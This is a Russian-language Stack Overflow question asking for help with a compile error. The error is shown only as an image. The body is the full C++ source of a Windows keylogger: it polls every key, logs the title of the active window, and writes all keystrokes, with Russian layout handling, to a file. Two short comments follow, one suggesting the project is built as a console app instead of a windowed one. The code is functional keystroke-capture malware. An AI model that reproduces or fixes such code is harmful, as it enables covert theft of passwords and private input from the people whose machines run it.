# Не компилируется код... выдает ошибку с фото

Tags: c++, обработка-ошибок

Не компилируется код... выдает ошибку с фото....[image: введите сюда описание изображения]

```
#include <Windows.h>
#include <fstream>
#include <string>

using namespace std;

const char filename[] = "keys.log";

int CALLBACK WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
    string lastTitle = "";
    char d;
    string path = "myFile.txt";
    ofstream ofs;
    ofs.open(path);
    wchar_t wChar;
    char title[1024];
    byte lpKeyboard[256];
    DWORD processId;
    HWND hwnd;
    HKL kLayout;

    WORD rusLangId = MAKELANGID(LANG_RUSSIAN, SUBLANG_DEFAULT);

    while (true)
    {
        Sleep(1);

        hwnd = GetForegroundWindow();
        GetWindowText(hwnd, title, 1023);
        if (lastTitle != title)
        {
            ofs << endl << "Window:";

            if (strlen(title) == 0)
                ofs << "No active window";
            else
                ofs << "'" << title << "'";

            ofs << endl << "Keys:";
            lastTitle = title;
        }

        kLayout = GetKeyboardLayout(GetWindowThreadProcessId(hwnd, &processId));

        for (unsigned char c = 1; c < 255; c++)
        {
            if (GetAsyncKeyState(c) & 1)
            {
                switch (c)
                {
                case VK_LBUTTON:
                    ofs << "<LMOUSE>";
                    break;

                case VK_RBUTTON:
                    ofs << "<RMOUSE>";
                    break;

                case VK_MBUTTON:
                    ofs << "<MMOUSE>";
                    break;

                case VK_RETURN:
                    ofs << "<RETURN>";
                    break;

                case VK_LSHIFT:
                case VK_RSHIFT:
                case VK_LCONTROL:
                case VK_RCONTROL:
                case VK_LMENU:
                case VK_RMENU:
                    break;

                case VK_SHIFT:
                    ofs << "<SHIFT>";
                    break;

                case VK_CONTROL:
                    ofs << "<CTRL>";
                    break;

                case VK_MENU:
                    ofs << "<ALT>";
                    break;

                case VK_BACK:
                    ofs << "<BACKSPACE>";
                    break;

                case VK_TAB:
                    ofs << "<TAB>";
                    break;

                case VK_ESCAPE:
                    ofs << "<ESC>";
                    break;

                case VK_PRIOR:
                    ofs << "<PAGE UP>";
                    break;

                case VK_NEXT:
                    ofs << "<PAGE DOWN>";
                    break;

                case VK_END:
                    ofs << "<END>";
                    break;

                case VK_HOME:
                    ofs << "<HOME>";
                    break;

                case VK_LEFT:
                    ofs << "<ARROW LEFT>";
                    break;

                case VK_UP:
                    ofs << "<ARROW UP>";
                    break;

                case VK_RIGHT:
                    ofs << "<ARROW RIGHT>";
                    break;

                case VK_DOWN:
                    ofs << "<ARROW DOWN>";
                    break;

                case VK_INSERT:
                    ofs << "<INS>";
                    break;

                case VK_DELETE:
                    ofs << "<DEL>";
                    break;

                case VK_LWIN:
                case VK_RWIN:
                    ofs << "<WIN>";
                    break;

                case VK_MULTIPLY:
                    ofs << "<NUM *>";
                    break;

                case VK_ADD:
                    ofs << "<NUM +>";
                    break;

                case VK_SUBTRACT:
                    ofs << "<NUM ->";
                    break;

                case VK_DIVIDE:
                    ofs << "<NUM />";
                    break;

                case VK_CAPITAL:
                    ofs << "<CAPS>";
                    break;

                case VK_NUMLOCK:
                    ofs << "<NUM>";
                    break;

                case VK_SCROLL:
                    ofs << "<SCROLL>";
                    break;

                case VK_SNAPSHOT:
                    ofs << "<PRINT SCREEN>";
                    break;

                case VK_PAUSE:
                    ofs << "<PAUSE>";
                    break;

                case VK_DECIMAL:
                    ofs << "<NUM .>";
                    break;

                case VK_OEM_PLUS:
                    ofs << "+";
                    break;

                case VK_OEM_COMMA:
                    if (LOWORD(kLayout) == rusLangId)
                        ofs << "á";
                    else
                        ofs << ",";
                    break;

                case VK_OEM_MINUS:
                    ofs << "-";
                    break;

                case VK_OEM_PERIOD:
                    if (LOWORD(kLayout) == rusLangId)
                        ofs << "þ";
                    else
                        ofs << ".";
                    break;

                case VK_APPS:
                    ofs << "<APP>";
                    break;

                case VK_OEM_1:
                    if (LOWORD(kLayout) == rusLangId)
                        ofs << "æ";
                    else
                        ofs << ";";
                    break;

                case VK_OEM_2:
                    ofs << "?";
                    break;

                case VK_OEM_3:
                    ofs << "~";
                    break;

                case VK_OEM_4:
                    if (LOWORD(kLayout) == rusLangId)
                        ofs << "õ";
                    else
                        ofs << "[";
                    break;

                case VK_OEM_5:
                    ofs << "\\";
                    break;

                case VK_OEM_6:
                    if (LOWORD(kLayout) == rusLangId)
                        ofs << "ú";
                    else
                        ofs << "]";
                    break;

                case VK_OEM_7:
                    if (LOWORD(kLayout) == rusLangId)
                        ofs << "ý";
                    else
                        ofs << "'";
                    break;

                default:
                    if ((c >= 0x41 && c <= 0x5A) ||
                        (c >= 0x30 && c <= 0x39) ||
                        (c == VK_SPACE))
                    {
                        GetKeyboardState(lpKeyboard);
                        ToUnicodeEx(c, MapVirtualKey(c, 0), lpKeyboard, &wChar, 2, 0, kLayout);
                        WideCharToMultiByte(CP_ACP, 0, &wChar, -1, &d, 1, NULL, NULL);
                        ofs << d;
                    }
                    else if (c >= VK_NUMPAD0 && c <= VK_NUMPAD9)
                        ofs << "<NUM " << (c - 96) << ">";
                    else if (c >= VK_F1 && c <= VK_F12)
                        ofs << "<F" << (c - 111) << ">";
                    else
                        ofs << "<UNKNOWN>";
                    break;
                }
                ofs.flush();
            }
        }
    }
    ofs.close();
    return 0;
}
```

Comment: добро пожаловать на Stack Overflow на русском! текстовую информацию лучше прилагать в виде текста: а) читать легче; б) можно копировать; в) поиск работает. исправить текст вопроса можно, нажав [edit] ниже текста вопроса

Comment: Похоже, компилируете оконное приложение как консольное.